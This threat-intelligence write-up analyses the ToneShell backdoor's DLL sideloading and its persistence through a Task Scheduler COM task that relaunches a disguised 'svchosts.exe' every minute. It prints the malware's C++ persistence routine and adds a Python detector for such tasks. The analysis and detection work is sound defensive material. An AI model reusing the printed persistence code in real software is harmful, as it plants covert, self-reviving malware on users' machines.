New ToneShell Backdoor With New Features Leverage Task Scheduler COM Service for Persistence


Since its first appearance earlier this year, the ToneShell backdoor has demonstrated a remarkable capacity for adaptation, used by the Mustang Panda group to maintain an enduring foothold in targeted environments.

This latest variant, discovered in early September, arrives concealed within sideloaded DLLs alongside legitimate executables.

Delivered via compressed archives purporting to contain innocuous documents, the backdoor activates when the host process triggers the malicious DLL, initiating a carefully orchestrated infection routine that evades cursory inspection.

In its typical deployment, the archive—often named with localized or politically themed titles—contains the legitimate loader executable and a renamed DLL payload.

Upon execution, the DLL probes its environment for sandbox artifacts, including process names and file paths associated with security solutions, before proceeding.

If these checks pass, the malware copies itself to a newly created subfolder under the user’s AppData directory, alongside several Microsoft Visual C++ runtime libraries.

Intezer analysts noted that this sequence ensures the backdoor runs from a location less likely to attract scrutiny, blending into the normal user profile structure.

Once relocated, the backdoor establishes persistence by interacting directly with Windows’ Task Scheduler COM service.

Intezer researchers identified that the malware leverages the ITaskService and IRegisteredTask interfaces to create a scheduled task named “dokanctl” in the root folder.

This task is configured to launch the malicious executable every minute, ensuring near-continuous reinfection even if the process is terminated.

The task definition sets the action path to the copied svchosts.exe within AppData, effectively masquerading as a legitimate Windows process.

Task creation (Source – Intezer)

The impact of this innovation is far-reaching. By abusing the Task Scheduler COM service rather than relying on registry run keys or service installation, the backdoor avoids well-known detection heuristics.

Moreover, since the scheduled task leverages existing system libraries, security tools without deep behavioral analysis may overlook the modification.

Persistence Mechanism via Task Scheduler COM Service

ToneShell’s persistence mechanism hinges on a few lines of custom code that instantiate and interact with COM interfaces.

After CoInitializeEx succeeds, the malware calls:

CComPtr<ITaskService> taskService;
HRESULT hr = taskService.CoCreateInstance(__uuidof(TaskScheduler));
if (SUCCEEDED(hr)) {
    taskService->Connect(_variant_t(), _variant_t(), _variant_t(), _variant_t());
    CComPtr<ITaskFolder> rootFolder;
    taskService->GetFolder(_bstr_t(L"\\"), &rootFolder);
    CComPtr<IRegisteredTask> existingTask;
    rootFolder->GetTask(_bstr_t(L"dokanctl"), &existingTask);
    if (!existingTask) {
        CComPtr<ITaskDefinition> taskDef;
        taskService->NewTask(0, &taskDef);
        CComPtr<ITriggerCollection> triggers;
        taskDef->get_Triggers(&triggers);
        CComPtr<ITrigger> trigger;
        triggers->Create(TASK_TRIGGER_TIME, &trigger);
        // configure trigger for every minute
        CComPtr<IActionCollection> actions;
        taskDef->get_Actions(&actions);
        CComPtr<IAction> action;
        actions->Create(TASK_ACTION_EXEC, &action);
        CComPtr<IExecAction> exec;
        action->QueryInterface(&exec);
        exec->put_Path(_bstr_t(L"%APPDATA%\\svchosts.exe"));
        rootFolder->RegisterTaskDefinition(_bstr_t(L"dokanctl"), taskDef,
            TASK_CREATE_OR_UPDATE, _variant_t(), _variant_t(),
            TASK_LOGON_INTERACTIVE_TOKEN, _variant_t(), nullptr);
    }
}

This approach demonstrates a nuanced understanding of Windows internals, allowing the backdoor to persist with minimal footprint.

The reliance on COM interfaces also sidesteps simple file-based detection, as the actual executable is invoked through the scheduler rather than directly executed on startup.

As organizations shore up defenses against ToneShell, monitoring for anomalous COM-based Task Scheduler interactions will become increasingly crucial.
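One defender-side check that follows from the behaviour described above, added here as an example and not taken from Intezer's report or from ToneShell itself: a small Python triage routine that parses Task Scheduler task XML (the format stored under %SystemRoot%\System32\Tasks and carried in the TaskContent field of Security event 4698) and flags the traits this variant combines, a repetition interval of a minute or less, an action that executes from the user profile, and a binary name that mimics a Windows system process. The sample task XML, the LOOKALIKES table and the 60-second threshold are constructed assumptions for the example.

```python
import re
import xml.etree.ElementTree as ET

# Namespace used by Task Scheduler task XML (files under System32\Tasks and
# the TaskContent of Security event 4698, "A scheduled task was created").
NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Constructed sample modelled on the reported ToneShell task: time trigger that
# repeats every minute, action pointing at svchosts.exe under %APPDATA%.
SAMPLE_TASK_XML = """<Task version="1.2"
  xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers>
    <TimeTrigger>
      <Repetition><Interval>PT1M</Interval></Repetition>
      <StartBoundary>2025-09-01T00:00:00</StartBoundary>
      <Enabled>true</Enabled>
    </TimeTrigger>
  </Triggers>
  <Actions Context="Author">
    <Exec><Command>%APPDATA%\\svchosts.exe</Command></Exec>
  </Actions>
</Task>"""

# Look-alike names for well-known Windows binaries (assumed list; extend as needed).
LOOKALIKES = {"svchosts.exe": "svchost.exe", "svch0st.exe": "svchost.exe"}


def iso_duration_seconds(value):
    """Convert the ISO 8601 durations Task Scheduler emits (PT1M, PT30S, P1DT2H) to seconds."""
    m = re.fullmatch(r"P(?:(\d+)D)?(?:T(?:(\d+)H)?(?:(\d+)M)?(?:(\d+)S)?)?", value or "")
    if not m:
        return None
    d, h, mi, s = (int(x) if x else 0 for x in m.groups())
    return d * 86400 + h * 3600 + mi * 60 + s


def analyze_task(task_path, xml_text, max_interval=60):
    """Return the reasons a task looks suspicious; an empty list means nothing was flagged."""
    root = ET.fromstring(xml_text)
    findings = []
    for interval in root.findall(".//t:Triggers//t:Repetition/t:Interval", NS):
        secs = iso_duration_seconds(interval.text)
        if secs is not None and secs <= max_interval:
            findings.append(f"repeats every {secs}s")
    for cmd in root.findall(".//t:Actions/t:Exec/t:Command", NS):
        path = (cmd.text or "").strip()
        low = path.lower()
        if "%appdata%" in low or "\\appdata\\" in low:
            findings.append(f"executes from user profile: {path}")
        exe = low.rsplit("\\", 1)[-1]
        if exe in LOOKALIKES:
            findings.append(f"binary name mimics {LOOKALIKES[exe]}: {exe}")
    if "\\" not in task_path.strip("\\"):
        findings.append("registered directly in the root task folder")
    return findings
```

The root-folder signal is weak on its own, since many legitimate tasks live there too; it is the combination with the short repetition interval and the user-profile executable that matches the pattern described here.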
